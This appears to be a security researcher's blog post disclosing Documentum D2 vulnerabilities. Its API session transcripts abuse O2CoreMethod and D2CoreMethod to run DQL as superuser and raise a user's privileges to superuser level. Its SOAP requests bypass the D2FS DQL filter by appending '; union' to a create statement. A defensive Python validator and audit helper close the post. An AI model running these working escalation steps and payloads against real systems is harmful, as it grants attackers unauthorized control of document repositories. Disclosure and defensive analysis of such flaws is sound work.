documentum security vulnerabilities: more deep dive in D2

To be honest, it took some time to hack D2GetAdminTicketMethod in 4.2 release, but that time was not wasted at all – now I know that D2 is a pretty big security hole 🙂

O2CoreMethod

Allows executing any DQL statement with superuser privileges (in practice the statement length cannot exceed 250 characters):

API> retrieve,c,dm_user where user_name='hacker'
...
11002f0a80000d0a
API> revert,c,l,
...
OK
API> get,c,l,user_privileges
...
0
API> create,c,dm_job
...
08002f0a80005dbc
API> append,c,l,method_arguments
SET> -dql update dm_user object set user_privileges=16 where user_name='hacker'
...
OK
API> save,c,l
...
OK
API> ?,c,execute do_method with method='O2CoreMethod', 
    arguments='-docbase_name d242 -password "" -job_id 08002f0a80005dbc -transaction false'
...

[DM_API_E_BADATTRNAME]error:  "Bad attribute name 'r_object_id' for document/object."
(1 row affected)

API> retrieve,c,dm_user where user_name='hacker'
...
11002f0a80000d0a
API> revert,c,l,
...
OK
API> get,c,l,user_privileges
...
16

D2FS WebService

I have no idea whether the D2 web interface allows users to execute DQL statements or not (for example, in the latest webtop release EMC restricted access to the DQL Editor component due to a lot of security issues described in this blog), but the D2FS web service does.

Unsuccessful attempt to create an object through D2FS:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" 
           xmlns:con="http://www.emc.com/d2fs/services/content_service" 
           xmlns:com="http://www.emc.com/d2fs/models/common" 
           xmlns:con1="http://www.emc.com/d2fs/models/context">
    <soapenv:Header/>
    <soapenv:Body>
        <con:getDQLContentRequest com:id="2" 
                   dql="create dm_document object set object_name='test'">
            <con1:context uid="1" login="hacker" password="hacker">
                <con1:repository com:id="1" repositoryName="d242" serverVersion="7" 
                                 repositoryType="DOCUMENTUM" hideDomain="true"/>
            </con1:context>
        </con:getDQLContentRequest>
    </soapenv:Body>
</soapenv:Envelope>


<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Body>
        <soapenv:Fault>
            <faultcode>soapenv:Server</faultcode>
            <faultstring xml:lang="en">Exception Service</faultstring>
            <detail>
                <faultDocument target="IllegalStateException" 
                               reason="No match found" code="D2-SERVICE-ERR" 
                               xmlns="http://www.emc.com/d2fs/exceptions">
                    ......................................
                               </faultDocument>
            </detail>
        </soapenv:Fault>
    </soapenv:Body>
</soapenv:Envelope>

Workaround (note the “; union” at the end of the query):

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" 
                  xmlns:con="http://www.emc.com/d2fs/services/content_service" 
                  xmlns:com="http://www.emc.com/d2fs/models/common" 
                  xmlns:con1="http://www.emc.com/d2fs/models/context">
    <soapenv:Header/>
    <soapenv:Body>
        <con:getDQLContentRequest com:id="2" 
                dql="create dm_document object set object_name='test'; union ">
            <con1:context uid="1" login="hacker" password="hacker">
                <con1:repository com:id="1" repositoryName="d242" serverVersion="7" 
                    repositoryType="DOCUMENTUM" hideDomain="true"/>
            </con1:context>
        </con:getDQLContentRequest>
    </soapenv:Body>
</soapenv:Envelope>

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Body>
        <ns17:getDQLContentResponse 
                     xmlns:ns17="http://www.emc.com/d2fs/services/content_service"
                     xmlns="http://www.emc.com/d2fs/exceptions"
                     xmlns:ns18="http://www.emc.com/d2fs/models/item"
                     xmlns:ns3="http://www.emc.com/d2fs/models/common">
            <ns18:docItems>
                <ns18:upperItem children="false" immutable="false" 
                         selected="false" type="DQL" ns3:id="2"/>
                <ns18:items children="false" immutable="false" 
                         selected="false" ns3:id="0000000000000000"/>
            </ns18:docItems>
        </ns17:getDQLContentResponse>
    </soapenv:Body>
</soapenv:Envelope>

D2CoreMethod

Has the same problem as O2CoreMethod but does not require creating a dm_job object:

API> retrieve,c,dm_user where user_name='hacker'
...
11002f0a80000d0a
API> revert,c,l,
...
OK
API> get,c,l,user_privileges
...
0
API> ?,c,execute do_method with method='D2CoreMethod', 
   arguments='-docbase_name d242 -password "" 
   -dql_filter "update dm_user object set user_privileges=16 where user_name=''hacker''"'
...

[DM_API_E_BADATTRNAME]error:  "Bad attribute name 'r_object_id' for document/object."
(1 row affected)

API> retrieve,c,dm_user where user_name='hacker'
...
11002f0a80000d0a
API> revert,c,l,
...
OK
API> get,c,l,user_privileges
...
16
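The D2FS behaviour above (a plain create statement is rejected with "No match found", but the same statement with "; union" appended is accepted) suggests the service only pattern-matches the DQL text. The following is an added example, not code from this post or from EMC: an allow-list validator a defender could place in front of getDQLContentRequest, plus a helper for auditing dm_job method_arguments for the -dql / -dql_filter parameters used by O2CoreMethod and D2CoreMethod. The naive_check function is an assumption about the shape of the original filter, and the SOAP sample is constructed from the request shown in the post.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample: the D2FS request from the post, with the "; union" suffix.
SAMPLE_REQUEST = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:con="http://www.emc.com/d2fs/services/content_service"
    xmlns:com="http://www.emc.com/d2fs/models/common">
  <soapenv:Body>
    <con:getDQLContentRequest com:id="2"
        dql="create dm_document object set object_name='test'; union "/>
  </soapenv:Body>
</soapenv:Envelope>"""

D2FS_NS = "http://www.emc.com/d2fs/services/content_service"


def extract_dql(soap_xml: str) -> str:
    """Pull the dql attribute out of a getDQLContentRequest envelope."""
    root = ET.fromstring(soap_xml)
    req = root.find(f".//{{{D2FS_NS}}}getDQLContentRequest")
    if req is None:
        raise ValueError("no getDQLContentRequest element")
    return req.get("dql", "")


def naive_check(dql: str) -> bool:
    """Assumed (not confirmed) shape of the original filter: accept the text
    if a SELECT or UNION keyword appears anywhere in it."""
    return re.search(r"\b(select|union)\b", dql, re.I) is not None


def strip_literals(dql: str) -> str:
    """Blank out single-quoted string literals ('' escapes an embedded quote)
    so keywords inside values cannot influence the classification."""
    return re.sub(r"'(?:[^']|'')*'", "''", dql)


def is_read_only_select(dql: str) -> bool:
    """Allow-list: exactly one statement, and it must begin with SELECT."""
    body = strip_literals(dql).strip()
    if ";" in body:  # a second statement (the "; union" trick) is rejected
        return False
    first = body.split(None, 1)[0].lower() if body else ""
    return first == "select"


def dql_args_in_method_call(arguments: str) -> list:
    """Flag -dql / -dql_filter parameters in do_method arguments or in a
    dm_job's method_arguments, for audit of the O2CoreMethod / D2CoreMethod
    vectors shown above."""
    return re.findall(r"-dql(?:_filter)?\b", arguments)
```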
